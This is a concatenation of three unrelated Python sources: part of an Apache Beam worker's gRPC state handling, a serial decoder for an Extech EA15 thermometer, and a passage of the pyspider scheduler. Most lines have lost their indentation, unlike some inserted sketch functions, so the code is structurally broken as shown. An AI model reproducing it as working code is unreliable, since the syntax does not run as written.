# It is an error to get progress for a not-in-flight bundle.
processor = self.bundle_processor_cache.lookup(
request.instruction_reference)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_progress=beam_fn_api_pb2.ProcessBundleProgressResponse(
metrics=processor.metrics() if processor else None,
monitoring_infos=processor.monitoring_infos() if processor else []))
def finalize_bundle(self, request, instruction_id):
processor = self.bundle_processor_cache.lookup(
request.instruction_reference)
if processor:
try:
finalize_response = processor.finalize_bundle()
self.bundle_processor_cache.release(request.instruction_reference)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
finalize_bundle=finalize_response)
except:
self.bundle_processor_cache.discard(request.instruction_reference)
raise
else:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
error='Instruction not running: %s' % instruction_id)
@contextlib.contextmanager
def maybe_profile(self, instruction_id):
if self.profiler_factory:
profiler = self.profiler_factory(instruction_id)
if profiler:
with profiler:
yield
else:
yield
else:
yield
class StateHandlerFactory(with_metaclass(abc.ABCMeta, object)):
"""An abstract factory for creating ``DataChannel``."""
@abc.abstractmethod
def create_state_handler(self, api_service_descriptor):
"""Returns a ``StateHandler`` from the given ApiServiceDescriptor."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcStateHandlerFactory(StateHandlerFactory):
"""A factory for ``GrpcStateHandler``.
Caches the created channels by ``state descriptor url``.
"""
def __init__(self, credentials=None):
self._state_handler_cache = {}
self._lock = threading.Lock()
self._throwing_state_handler = ThrowingStateHandler()
self._credentials = credentials
def create_state_handler(self, api_service_descriptor):
if not api_service_descriptor:
return self._throwing_state_handler
url = api_service_descriptor.url
if url not in self._state_handler_cache:
with self._lock:
if url not in self._state_handler_cache:
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size is
# controlled in a layer above.
options = [('grpc.max_receive_message_length', -1),
('grpc.max_send_message_length', -1)]
if self._credentials is None:
logging.info('Creating insecure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.insecure_channel(
url, options=options)
else:
logging.info('Creating secure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.secure_channel(
url, self._credentials, options=options)
logging.info('State channel established.')
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(grpc_channel,
WorkerIdInterceptor())
self._state_handler_cache[url] = GrpcStateHandler(
beam_fn_api_pb2_grpc.BeamFnStateStub(grpc_channel))
return self._state_handler_cache[url]
def close(self):
logging.info('Closing all cached gRPC state handlers.')
for _, state_handler in self._state_handler_cache.items():
state_handler.done()
self._state_handler_cache.clear()
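# Illustrative sketch (not part of the SDK harness): the double-checked caching used
# by create_state_handler() above, with a generic factory callable standing in for
# the gRPC channel construction.
def _cached_create(cache, lock, key, factory):
    if key not in cache:
        with lock:
            if key not in cache:  # re-check under the lock
                cache[key] = factory(key)
    return cache[key]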
class ThrowingStateHandler(object):
"""A state handler that errors on any requests."""
def blocking_get(self, state_key, instruction_reference):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'a state ApiServiceDescriptor for instruction %s and state key %s.'
% (instruction_reference, state_key))
def blocking_append(self, state_key, data, instruction_reference):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'a state ApiServiceDescriptor for instruction %s and state key %s.'
% (instruction_reference, state_key))
def blocking_clear(self, state_key, instruction_reference):
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'a state ApiServiceDescriptor for instruction %s and state key %s.'
% (instruction_reference, state_key))
class GrpcStateHandler(object):
_DONE = object()
def __init__(self, state_stub):
self._lock = threading.Lock()
self._state_stub = state_stub
self._requests = queue.Queue()
self._responses_by_id = {}
self._last_id = 0
self._exc_info = None
self._context = threading.local()
self.start()
@contextlib.contextmanager
def process_instruction_id(self, bundle_id):
if getattr(self._context, 'process_instruction_id', None) is not None:
raise RuntimeError(
'Already bound to %r' % self._context.process_instruction_id)
self._context.process_instruction_id = bundle_id
try:
yield
finally:
self._context.process_instruction_id = None
def start(self):
self._done = False
def request_iter():
while True:
request = self._requests.get()
if request is self._DONE or self._done:
break
yield request
responses = self._state_stub.State(request_iter())
def pull_responses():
try:
for response in responses:
self._responses_by_id[response.id].set(response)
if self._done:
break
except: # pylint: disable=bare-except
self._exc_info = sys.exc_info()
raise
reader = threading.Thread(target=pull_responses, name='read_state')
reader.daemon = True
reader.start()
def done(self):
self._done = True
self._requests.put(self._DONE)
def blocking_get(self, state_key, continuation_token=None):
response = self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
get=beam_fn_api_pb2.StateGetRequest(
continuation_token=continuation_token)))
return response.get.data, response.get.continuation_token
def blocking_append(self, state_key, data):
self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
append=beam_fn_api_pb2.StateAppendRequest(data=data)))
def blocking_clear(self, state_key):
self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
clear=beam_fn_api_pb2.StateClearRequest()))
def _blocking_request(self, request):
request.id = self._next_id()
request.instruction_reference = self._context.process_instruction_id
self._responses_by_id[request.id] = future = _Future()
self._requests.put(request)
while not future.wait(timeout=1):
if self._exc_info:
t, v, tb = self._exc_info
raise_(t, v, tb)
elif self._done:
raise RuntimeError()
del self._responses_by_id[request.id]
response = future.get()
if response.error:
raise RuntimeError(response.error)
else:
return response
def _next_id(self):
self._last_id += 1
return str(self._last_id)
class _Future(object):
"""A simple future object to implement blocking requests.
"""
def __init__(self):
self._event = threading.Event()
def wait(self, timeout=None):
return self._event.wait(timeout)
def get(self, timeout=None):
if self.wait(timeout):
return self._value
else:
raise LookupError()
def set(self, value):
self._value = value
self._event.set()
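# Illustrative sketch (not part of the SDK harness): how GrpcStateHandler pairs a
# request with its response using _Future above. The caller registers a future under
# the request id, a reader thread sets it when the matching response arrives, and the
# caller polls wait() with a short timeout so it can also notice shutdown or errors.
def _future_roundtrip_sketch():
    responses_by_id = {}
    responses_by_id['1'] = future = _Future()

    def reader():
        # stands in for the thread that consumes the gRPC response stream
        responses_by_id['1'].set('response for request 1')

    t = threading.Thread(target=reader)
    t.start()
    while not future.wait(timeout=1):
        pass  # real code checks for reader errors / shutdown here
    t.join()
    return future.get()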
|
extech_ea15.py | #!/usr/bin/env python
# Copyright 2020 Kent A. Vander Velden <kent.vandervelden@gmail.com>
#
# If you use this software, please consider contacting me. I'd like to hear
# about your work.
#
# This file is part of Extech-EA15, a decoder for the Extech EA15 thermocouple
# datalogging thermometer.
#
# Please see LICENSE for limitations on use.
#
# If you see a permission problem with accessing serial ports, the following may help.
# Add yourself to the dialout group and remove modemmanager.
# $ adduser kent dialout
# $ apt remove modemmanager
import datetime
import multiprocessing as mp
import random
import time
import serial
class Temperature:
v_ = 0
valid_ = False
def __init__(self, v=None, u='C'):
if v is not None:
self.set(v, u)
def __str__(self):
return f'{self.v_:.02f}C'
def set(self, v, u='C'):
self.valid_ = True
if u == 'C':
self.v_ = v
elif u == 'F':
self.v_ = self.f2c(v)
elif u == 'K':
self.v_ = self.k2c(v)
else:
self.valid_ = False
def C(self):
return self.v_
def F(self):
return self.c2f(self.v_)
def K(self):
return self.c2k(self.v_)
@staticmethod
def f2c(v):
return (v - 32) * (5 / 9.)
@staticmethod
def k2c(v):
return v - 273.15
@staticmethod
def c2f(v):
return v * (9 / 5.) + 32
@staticmethod
def c2k(v):
return v + 273.15
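# Illustrative usage sketch (not part of the original module): Temperature stores the
# value in Celsius internally and converts to the requested unit on demand.
def _temperature_example():
    t = Temperature(98.6, 'F')   # stored internally as 37.0 C
    return t.C(), t.F(), t.K()   # -> approximately (37.0, 98.6, 310.15)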
class ExtechEA15Serial:
ser = None
download_datalog_ = False
def __init__(self, dev_fn='', timeformat='datetime'):
self.open(dev_fn)
def __del__(self):
if self.ser is not None:
self.ser.close()
def __enter__(self):
return self
def __exit__(self, type_, value, tb):
pass
def open(self, dev_fn):
# Timeout must be less than the interval between consecutive packets, ~ 1.5s
# and not so long that recording the timestamp is delayed. 0.1s seems fine.
self.ser = serial.Serial(dev_fn, 9600, timeout=.1)
def decode(self, buf, dt=None):
d = {'dt': datetime.datetime.now() if dt is None else dt,
't1': Temperature(),
't1u': '',
't2': '',
't2u': '',
'type': '',
'valid': False
}
d2 = {'dt': d['dt'],
't1': Temperature(),
't2': Temperature(),
'type': '',
'valid': False
}
if not (buf[0] == 0x02 and buf[-1] == 0x03 and len(buf) == 9):
return d2
temp_units = {0: 'C', 2: 'K', 3: 'F'}
sensor_types = {0: 'K', 1: 'J', 2: 'E', 3: 'T', 4: 'R', 5: 'S', 6: 'N'}
try:
s1 = 1
if buf[1] & 0xf0:
s1 = -1
s2 = 1
if buf[4] & 0xf0:
s2 = -1
d['t1'] = s1 * (buf[2] * 0xff + buf[3]) / 10.
d['t1u'] = temp_units[buf[1] & 0x7f]
d['t2'] = s2 * (buf[5] * 0xff + buf[6]) / 10.
d['t2u'] = temp_units[buf[4] & 0x7f]
d['type'] = sensor_types[buf[7]]
except KeyError as e:
print(e, buf)
d['valid'] = False
else:
d['valid'] = True
d2 = {'dt': d['dt'],
't1': Temperature(d['t1'], d['t1u']),
't2': Temperature(d['t2'], d['t2u']),
'type': d['type'],
'valid': d['valid'],
}
return d2
def decode2(self, buf, start_dt):
if not (buf[0] == 0x02 and buf[-1] == 0x03):
return []
all_lst = []
i = 1
s = 0
sps = 0
lst = []
marker = b'\x00\x55\xaa\x00'
while True:
if s == 0:
if len(buf) <= i + 5:
break
if buf[i:i + 4] == marker:
s = 1
sps = buf[i + 4]
i += 5
else:
i += 1
else:
if len(buf) <= i + 7:
break
if buf[i:i + 4] == marker:
all_lst += [(sps, lst)]
lst = []
sps = buf[i + 4]
i += 5
else:
bb = buf[i:i + 7]
bb = b'\x02' + bb + b'\x03'
lst += [self.decode(bb, start_dt + datetime.timedelta(seconds=i * sps))]
i += 7
if i + 1 != len(buf):
print(f'Truncated download: {i + 1} {len(buf)}')
if lst:
all_lst += [(sps, lst)]
return all_lst
datalog_download_state_ = 0
datalog_expected_ = 0
def decode_one(self):
while True:
if self.download_datalog_ and self.datalog_download_state_ == 0:
self.datalog_download_state_ = 1
self.download_datalog_ = False
packet_type = 0
buf = b''
st0 = time.time()
while True:
c = self.ser.read()
et = time.time()
# There is a small delay, ~1.5s, between packets. Use the delay to tokenize the
# serial stream. When the delay is greater than the serial timeout, c will be empty.
# If buf is not empty, check if buf may contain a packet.
if buf and not c:
if buf[0] == 0x02 and buf[-1] == 0x03:
if buf.startswith(b'\x02\x00\x55\xaa\x00'):
if len(buf) == self.datalog_expected_ + 2:
packet_type = 3
else:
if len(buf) == 9:
packet_type = 1
elif len(buf) == 5:
packet_type = 2
break
# Don't wait forever
if et - st0 > 5:
print('Aborting')
return None
# Start over
elif et - st0 > .5:
print('Restarting')
buf = b''
continue
buf += c
if packet_type == 0:
print('Unable to decode:', buf)
else:
if packet_type == 1:
if self.datalog_download_state_ == 1:
self.ser.write(b'\x41')
self.ser.flush()
elif self.datalog_download_state_ == 2:
self.ser.write(b'\x55')
self.ser.flush()
if packet_type == 1:
return self.decode(buf)
elif packet_type == 2:
# print('Datalog len packet:', buf)
# 02 00 8c 80 03 <= empty datalog 35968
# 02 00 8c 8c 03 <= 1 datalog entry 35980 12 = 1*5 + 1*7
# 02 00 8c 93 03 <= 2 datalog entries 35987 19 = 1*5 + 2*7
# 02 00 8c a1 03 <= 4 datalog entries 36001 33 = 1*5 + 4*7
# 02 00 8c c9 03 <= 2 sets with 1 and 8 records 36041 73 = 2*5 + 9*7
# 02 00 8d 57 03 <= 30 datalog entries 36183 215 = 1*5 + 30*7
self.datalog_expected_ = buf[2] * 256 + buf[3] - 0x8c80
if self.datalog_expected_ == 0:
print(f'Datalog is empty')
self.datalog_download_state_ = 0
else:
print(f'Expecting {self.datalog_expected_} bytes from datalog')
self.datalog_download_state_ = 2
elif packet_type == 3:
self.datalog_download_state_ = 0
self.datalog_expected_ = 0
return self.decode2(buf, datetime.datetime.now())
def decode_loop(self):
while True:
v = self.decode_one()
if v is None:
continue
print(v)
def download_datalog(self):
if self.datalog_download_state_ == 0:
self.download_datalog_ = True
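# Illustrative sketch (not part of the original module): building a fake 9-byte
# live-reading packet of the shape decode() above expects (STX, T1 unit/sign,
# T1 hi, T1 lo, T2 unit/sign, T2 hi, T2 lo, sensor type, ETX) and decoding it with
# the same arithmetic. The byte values below are made up for illustration.
def _decode_packet_sketch():
    buf = bytes([0x02, 0x00, 0x00, 0xE5, 0x00, 0x00, 0xFA, 0x00, 0x03])
    s1 = -1 if buf[1] & 0xf0 else 1
    t1 = s1 * (buf[2] * 0xff + buf[3]) / 10.   # mirrors decode(): 0xE5 -> 22.9
    t2 = (buf[5] * 0xff + buf[6]) / 10.        # 0xFA -> 25.0
    temp_units = {0: 'C', 2: 'K', 3: 'F'}
    sensor_types = {0: 'K', 1: 'J', 2: 'E', 3: 'T', 4: 'R', 5: 'S', 6: 'N'}
    return t1, temp_units[buf[1] & 0x7f], t2, temp_units[buf[4] & 0x7f], sensor_types[buf[7]]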
class ExtechEA15Threaded:
def __init__(self, dev_fn='', timeformat='datetime'):
self.q = mp.Queue()
self.q2 = mp.Queue()
self.q3 = mp.Queue()
self.dev_fn_ = dev_fn
self.ea15 = ExtechEA15Serial(dev_fn, timeformat=timeformat)
self.download_datalog_ = False
def __del__(self):
pass
def __enter__(self):
self.run()
return self
def __exit__(self, type_, value, tb):
pass
def open(self, dev_fn):
self.ea15.open(dev_fn)
def run(self):
p = mp.Process(target=self.main, args=(self,))
p.start()
def main(self_, self):
# self.ea15 = ExtechEA15(self.dev_fn_)
while True:
if not self.q3.empty():
s = self.q3.get()
if s == 'Datalog':
self.ea15.download_datalog()
v = self.ea15.decode_one()
if v is None:
pass
elif isinstance(v, dict):
self.q.put(v)
elif isinstance(v, list):
self.q2.put(v)
def download_datalog(self):
self.q3.put('Datalog')
def main(dev_fn):
def decode(v):
return f'{v["dt"]} : {v["t1"]} : {v["t2"]} : {v["type"]} : {v["valid"]}'
# Below are a few different ways to use the classes
if False:
with ExtechEA15Serial(dev_fn) as ea15:
ea15.decode_loop()
if False:
with ExtechEA15Serial(dev_fn) as ea15:
for i in range(3):
print(i, ea15.decode_one())
if False:
ea15 = ExtechEA15Serial(dev_fn)
print(ea15.decode_one())
if False:
ea15 = ExtechEA15Threaded(dev_fn)
ea15.run()
while True:
while not ea15.q.empty():
v = ea15.q.get()
print(decode(v))
if False:
with ExtechEA15Threaded(dev_fn, timeformat='dt') as ea15:
while True:
while not ea15.q.empty():
v = ea15.q.get()
print(decode(v))
# import queue
# try:
# v = ea15.q.get(timeout=.05)
# print('dequeued', v)
# except queue.Empty:
# print('timeout')
if random.random() < .05:
print('Requesting datalog download')
ea15.download_datalog()
while not ea15.q2.empty():
v2_ = ea15.q2.get()
for j, v2 in enumerate(v2_):
sps, lst = v2
print(f'Datalog set {j + 1} with {len(lst)} records, sampled every {sps} seconds')
for i, v in enumerate(lst):
# v['dt'] = i * sps
print(f'{j + 1:02d} : {i + 1:04d} : {decode(v)}')
time.sleep(.5)
if True:
import matplotlib.pyplot as plt
# If you encounter an error about not being able to use the TkInter matplotlib backend
# or unable to load the tkinter module, try the following. (TkInter cannot be installed
# by pipenv.)
# sudo apt-get install python3-tk
plt.ion()
fig = plt.figure()
ax = fig.add_subplot(111)
x = []
y1 = []
y2 = []
line1, = ax.plot(x, y1, 'r-', label='T1') # Returns a tuple of line objects, thus the comma
line2, = ax.plot(x, y2, 'b-', label='T2') # Returns a tuple of line objects, thus the comma
ax.set_xlabel('Time [s]')
ax.set_ylabel('Temperature [C]')
plt.legend()
with ExtechEA15Threaded(dev_fn) as ea15:
t0 = 0
while True:
while not ea15.q.empty():
v = ea15.q.get()
print(decode(v))
if not v['valid']:
continue
y1 += [v['t1'].C()]
y2 += [v['t2'].C()]
if x == []:
t0 = v['dt']
x += [(v['dt'] - t0).total_seconds()]
line1.set_xdata(x)
line1.set_ydata(y1)
line2.set_xdata(x)
line2.set_ydata(y2)
ax.relim()
ax.autoscale_view()
fig.canvas.draw()
fig.canvas.flush_events()
time.sleep(.5)
def find_dev(id_str):
import os
dn = '/dev/serial/by-id/'
for fn in os.listdir(dn):
if id_str in fn:
return os.path.join(dn, fn)
return ''
if __name__ == "__main__":
dev_fn = find_dev('usb-Prolific_Technology_Inc._USB-Serial_Controller')
if not dev_fn:
print('No device found')
else:
print('Using device:', dev_fn)
main(dev_fn)
|
scheduler.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-02-07 17:05:11
import itertools
import json
import logging
import os
import time
from collections import deque
from six import iteritems, itervalues
from six.moves import queue as Queue
from pyspider.libs import counter, utils
from pyspider.libs.base_handler import BaseHandler
from .task_queue import TaskQueue
logger = logging.getLogger('scheduler')
class Project(object):
'''
project for scheduler
'''
def __init__(self, scheduler, project_info):
'''
'''
self.scheduler = scheduler
self.active_tasks = deque(maxlen=scheduler.ACTIVE_TASKS)
self.task_queue = TaskQueue()
self.task_loaded = False
self._selected_tasks = False # selected tasks after recent pause
self._send_finished_event_wait = 0 # wait for scheduler.FAIL_PAUSE_NUM loop steps before sending the event
self.md5sum = None
self._send_on_get_info = False
self.waiting_get_info = True
self._paused = False
self._paused_time = 0
self._unpause_last_seen = None
self.update(project_info)
@property
def paused(self):
if self.scheduler.FAIL_PAUSE_NUM <= 0:
return False
# unpaused --(last FAIL_PAUSE_NUM task failed)--> paused --(PAUSE_TIME)--> unpause_checking
# unpaused <--(last UNPAUSE_CHECK_NUM task have success)--|
# paused <--(last UNPAUSE_CHECK_NUM task no success)--|
if not self._paused:
fail_cnt = 0
for _, task in self.active_tasks:
# ignore select task
if task.get('type') == self.scheduler.TASK_PACK:
continue
if 'process' not in task['track']:
logger.error('process not in task, %r', task)
if task['track']['process']['ok']:
break
else:
fail_cnt += 1
if fail_cnt >= self.scheduler.FAIL_PAUSE_NUM:
break
if fail_cnt >= self.scheduler.FAIL_PAUSE_NUM:
self._paused = True
self._paused_time = time.time()
elif self._paused is True and (self._paused_time + self.scheduler.PAUSE_TIME < time.time()):
self._paused = 'checking'
self._unpause_last_seen = self.active_tasks[0][1] if len(self.active_tasks) else None
elif self._paused == 'checking':
cnt = 0
fail_cnt = 0
for _, task in self.active_tasks:
if task is self._unpause_last_seen:
break
# ignore select task
if task.get('type') == self.scheduler.TASK_PACK:
continue
cnt += 1
if task['track']['process']['ok']:
# break with enough check cnt
cnt = max(cnt, self.scheduler.UNPAUSE_CHECK_NUM)
break
else:
fail_cnt += 1
if cnt >= self.scheduler.UNPAUSE_CHECK_NUM:
if fail_cnt == cnt:
self._paused = True
self._paused_time = time.time()
else:
self._paused = False
return self._paused is True
def update(self, project_info):
self.project_info = project_info
self.name = project_info['name']
self.group = project_info['group']
self.db_status = project_info['status']
self.updatetime = project_info['updatetime']
md5sum = utils.md5string(project_info['script'])
if (self.md5sum != md5sum or self.waiting_get_info) and self.active:
self._send_on_get_info = True
self.waiting_get_info = True
self.md5sum = md5sum
if self.active:
self.task_queue.rate = project_info['rate']
self.task_queue.burst = project_info['burst']
else:
self.task_queue.rate = 0
self.task_queue.burst = 0
logger.info('project %s updated, status:%s, paused:%s, %d tasks',
self.name, self.db_status, self.paused, len(self.task_queue))
def on_get_info(self, info):
self.waiting_get_info = False
self.min_tick = info.get('min_tick', 0)
self.retry_delay = info.get('retry_delay', {})
self.crawl_config = info.get('crawl_config', {})
@property
def active(self):
return self.db_status in ('RUNNING', 'DEBUG')
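# Illustrative sketch (not part of pyspider): a simplified version of the pause state
# machine implemented by Project.paused above. A project becomes paused after
# FAIL_PAUSE_NUM consecutive failures, re-enters a 'checking' state once PAUSE_TIME
# has elapsed, and then either unpauses (any recent success) or pauses again (all of
# the last UNPAUSE_CHECK_NUM checked tasks failed).
def _next_pause_state(state, recent_results, fail_pause_num, unpause_check_num, pause_expired):
    """recent_results is a list of booleans, newest first (True = task succeeded)."""
    if state == 'unpaused':
        head = recent_results[:fail_pause_num]
        if len(head) >= fail_pause_num and not any(head):
            return 'paused'
        return 'unpaused'
    if state == 'paused':
        return 'checking' if pause_expired else 'paused'
    # state == 'checking'
    head = recent_results[:unpause_check_num]
    if any(head):
        return 'unpaused'
    if len(head) >= unpause_check_num:
        return 'paused'
    return 'checking'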
class Scheduler(object):
UPDATE_PROJECT_INTERVAL = 5 * 60
default_schedule = {
'priority': 0,
'retries': 3,
'exetime': 0,
'age': -1,
'itag': None,
}
LOOP_LIMIT = 1000
LOOP_INTERVAL = 0.1
ACTIVE_TASKS = 100
INQUEUE_LIMIT = 0
EXCEPTION_LIMIT = 3
DELETE_TIME = 24 * 60 * 60
DEFAULT_RETRY_DELAY = {
0: 30,
1: 1*60*60,
2: 6*60*60,
3: 12*60*60,
'': 24*60*60
}
FAIL_PAUSE_NUM = 10
PAUSE_TIME = 5*60
UNPAUSE_CHECK_NUM = 3
TASK_PACK = 1
STATUS_PACK = 2 # current not used
REQUEST_PACK = 3 # current not used
def __init__(self, taskdb, projectdb, newtask_queue, status_queue,
out_queue, data_path='./data', resultdb=None):
self.taskdb = taskdb
self.projectdb = projectdb
self.resultdb = resultdb
self.newtask_queue = newtask_queue
self.status_queue = status_queue
self.out_queue = out_queue
self.data_path = data_path
self._send_buffer = deque()
self._quit = False
self._exceptions = 0
self.projects = dict()
self._force_update_project = False
self._last_update_project = 0
self._last_tick = int(time.time())
self._postpone_request = []
self._cnt = {
"5m_time": counter.CounterManager(
lambda: counter.TimebaseAverageEventCounter(30, 10)),
"5m": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(30, 10)),
"1h": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(60, 60)),
"1d": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(10 * 60, 24 * 6)),
"all": counter.CounterManager(
lambda: counter.TotalCounter()),
}
self._cnt['1h'].load(os.path.join(self.data_path, 'scheduler.1h'))
self._cnt['1d'].load(os.path.join(self.data_path, 'scheduler.1d'))
self._cnt['all'].load(os.path.join(self.data_path, 'scheduler.all'))
self._last_dump_cnt = 0
def _update_projects(self):
'''Check project update'''
now = time.time()
if (
not self._force_update_project
and self._last_update_project + self.UPDATE_PROJECT_INTERVAL > now
):
return
for project in self.projectdb.check_update(self._last_update_project):
self._update_project(project)
logger.debug("project: %s updated.", project['name'])
self._force_update_project = False
self._last_update_project = now
get_info_attributes = ['min_tick', 'retry_delay', 'crawl_config']
def _update_project(self, project):
'''update one project'''
if project['name'] not in self.projects:
self.projects[project['name']] = Project(self, project)
else:
self.projects[project['name']].update(project)
project = self.projects[project['name']]
if project._send_on_get_info:
# update project runtime info from processor by sending a _on_get_info
# request, result is in status_page.track.save
project._send_on_get_info = False
self.on_select_task({
'taskid': '_on_get_info',
'project': project.name,
'url': 'data:,_on_get_info',
'status': self.taskdb.SUCCESS,
'fetch': {
'save': self.get_info_attributes,
},
'process': {
'callback': '_on_get_info',
},
})
# load task queue when project is running and delete task_queue when project is stopped
if project.active:
if not project.task_loaded:
self._load_tasks(project)
project.task_loaded = True
else:
if project.task_loaded:
project.task_queue = TaskQueue()
project.task_loaded = False
if project not in self._cnt['all']:
self._update_project_cnt(project.name)
scheduler_task_fields = ['taskid', 'project', 'schedule', ]
def _load_tasks(self, project):
'''load tasks from database'''
task_queue = project.task_queue
for task in self.taskdb.load_tasks(
self.taskdb.ACTIVE, project.name, self.scheduler_task_fields
):
taskid = task['taskid']
_schedule = task.get('schedule', self.default_schedule)
priority = _schedule.get('priority', self.default_schedule['priority'])
exetime = _schedule.get('exetime', self.default_schedule['exetime'])
task_queue.put(taskid, priority, exetime)
project.task_loaded = True
logger.debug('project: %s loaded %d tasks.', project.name, len(task_queue))
if project not in self._cnt['all']:
self._update_project_cnt(project)
self._cnt['all'].value((project.name, 'pending'), len(project.task_queue))
def _update_project_cnt(self, project_name):
status_count = self.taskdb.status_count(project_name)
self._cnt['all'].value(
(project_name, 'success'),
status_count.get(self.taskdb.SUCCESS, 0)
)
self._cnt['all'].value(
(project_name, 'failed'),
status_count.get(self.taskdb.FAILED, 0) + status_count.get(self.taskdb.BAD, 0)
)
self._cnt['all'].value(
(project_name, 'pending'),
status_count.get(self.taskdb.ACTIVE, 0)
)
def task_verify(self, task):
'''
return False if any of 'taskid', 'project', 'url' is not in task dict
or project is not in task_queue
'''
for each in ('taskid', 'project', 'url', ):
if each not in task or not task[each]:
logger.error('%s not in task: %.200r', each, task)
return False
if task['project'] not in self.projects:
logger.error('unknown project: %s', task['project'])
return False
project = self.projects[task['project']]
if not project.active:
logger.error('project %s not started, please set status to RUNNING or DEBUG',
task['project'])
return False
return True
def insert_task(self, task):
'''insert task into database'''
return self.taskdb.insert(task['project'], task['taskid'], task)
def update_task(self, task):
'''update task in database'''
return self.taskdb.update(task['project'], task['taskid'], task)
def put_task(self, task):
'''put task to task queue'''
_schedule = task.get('schedule', self.default_schedule)
self.projects[task['project']].task_queue.put(
task['taskid'],
priority=_schedule.get('priority', self.default_schedule['priority']),
exetime=_schedule.get('exetime', self.default_schedule['exetime'])
)
def send_task(self, task, force=True):
'''
dispatch task to fetcher
the out queue may have a size limit to prevent blocking, so a send_buffer is used
'''
try:
self.out_queue.put_nowait(task)
except Queue.Full:
if force:
self._send_buffer.appendleft(task)
else:
raise
def _check_task_done(self):
'''Check status queue'''
cnt = 0
try:
while True:
task = self.status_queue.get_nowait()
# check _on_get_info result here
if task.get('taskid') == '_on_get_info' and 'project' in task and 'track' in task:
if task['project'] not in self.projects:
continue
project = self.projects[task['project']]
project.on_get_info(task['track'].get('save') or {})
logger.info(
'%s on_get_info %r', task['project'], task['track'].get('save', {})
)
continue
elif not self.task_verify(task):
continue
self.on_task_status(task)
cnt += 1
except Queue.Empty:
pass
return cnt
merge_task_fields = ['taskid', 'project', 'url', 'status', 'schedule', 'lastcrawltime']
def _check_request(self):
'''Check new task queue'''
# check _postpone_request first
todo = []
for task in self._postpone_request:
if task['project'] not in self.projects:
continue
if self.projects[task['project']].task_queue.is_processing(task['taskid']):
todo.append(task)
else:
self.on_request(task)
self._postpone_request = todo
tasks = {}
while len(tasks) < self.LOOP_LIMIT:
try:
task = self.newtask_queue.get_nowait()
except Queue.Empty:
break
if isinstance(task, list):
_tasks = task
else:
_tasks = (task, )
for task in _tasks:
if not self.task_verify(task):
continue
if task['taskid'] in self.projects[task['project']].task_queue:
if not task.get('schedule', {}).get('force_update', False):
logger.debug('ignore newtask %(project)s:%(taskid)s %(url)s', task)
continue
if task['taskid'] in tasks:
if not task.get('schedule', {}).get('force_update', False):
continue
tasks[task['taskid']] = task
for task in itervalues(tasks):
self.on_request(task)
return len(tasks)
def _check_cronjob(self):
"""Check projects cronjob tick, return True when a new tick is sended"""
now = time.time()
self._last_tick = int(self._last_tick)
if now - self._last_tick < 1:
return False
self._last_tick += 1
for project in itervalues(self.projects):
if not project.active:
continue
if project.waiting_get_info:
continue
if project.min_tick == 0:
continue
if self._last_tick % int(project.min_tick) != 0:
continue
self.on_select_task({
'taskid': '_on_cronjob',
'project': project.name,
'url': 'data:,_on_cronjob',
'status': self.taskdb.SUCCESS,
'fetch': {
'save': {
'tick': self._last_tick,
},
},
'process': {
'callback': '_on_cronjob',
},
})
return True
request_task_fields = [
'taskid',
'project',
'url',
'status',
'schedule',
'fetch',
'process',
'track',
'lastcrawltime'
]
def _check_select(self):
'''Select task to fetch & process'''
while self._send_buffer:
_task = self._send_buffer.pop()
try:
# use force=False here to avoid appending to send_buffer automatically and to get the Queue.Full exception instead
self.send_task(_task, False)
except Queue.Full:
self._send_buffer.append(_task)
break
if self.out_queue.full():
return {}
taskids = []
cnt = 0
cnt_dict = dict()
limit = self.LOOP_LIMIT
for project in itervalues(self.projects):
if not project.active:
continue
# only check project pause when selecting new tasks; cronjob and new requests still work
if project.paused:
continue
if project.waiting_get_info:
continue
if cnt >= limit:
break
# task queue
task_queue = project.task_queue
task_queue.check_update()
project_cnt = 0
# check send_buffer here. When it is not empty, out_queue may be blocked, so do not send tasks
while cnt < limit and project_cnt < limit / 10:
taskid = task_queue.get()
if not taskid:
break
taskids.append((project.name, taskid))
if taskid != 'on_finished':
project_cnt += 1
cnt += 1
cnt_dict[project.name] = project_cnt
if project_cnt:
project._selected_tasks = True
project._send_finished_event_wait = 0
# check and send finished event to project
if not project_cnt and len(task_queue) == 0 and project._selected_tasks:
# wait for self.FAIL_PAUSE_NUM steps to make sure all tasks in queue have been processed
if project._send_finished_event_wait < self.FAIL_PAUSE_NUM:
project._send_finished_event_wait += 1
else:
project._selected_tasks = False
project._send_finished_event_wait = 0
self.newtask_queue.put({
'project': project.name,
'taskid': 'on_finished',
'url': 'data:,on_finished',
'process': {
'callback': 'on_finished',
},
"schedule": {
"age": 0,
"priority": 9,
"force_update": True,
},
})
for project, taskid in taskids:
self._load_put_task(project, taskid)
return cnt_dict
def _load_put_task(self, project, taskid):
try:
task = self.taskdb.get_task(project, taskid, fields=self.request_task_fields)
except ValueError:
logger.error('bad task pack %s:%s', project, taskid)
return
if not task:
return
task = self.on_select_task(task)
def _print_counter_log(self):
# print top 5 active counters
keywords = ('pending', 'success', 'retry', 'failed')
total_cnt = {}
project_actives = []
project_fails = []
for key in keywords:
total_cnt[key] = 0
for project, subcounter in iteritems(self._cnt['5m']):
actives = 0
for key in keywords:
cnt = subcounter.get(key, None)
if cnt:
cnt = cnt.sum
total_cnt[key] += cnt
actives += cnt
project_actives.append((actives, project))
fails = subcounter.get('failed', None)
if fails:
project_fails.append((fails.sum, project))
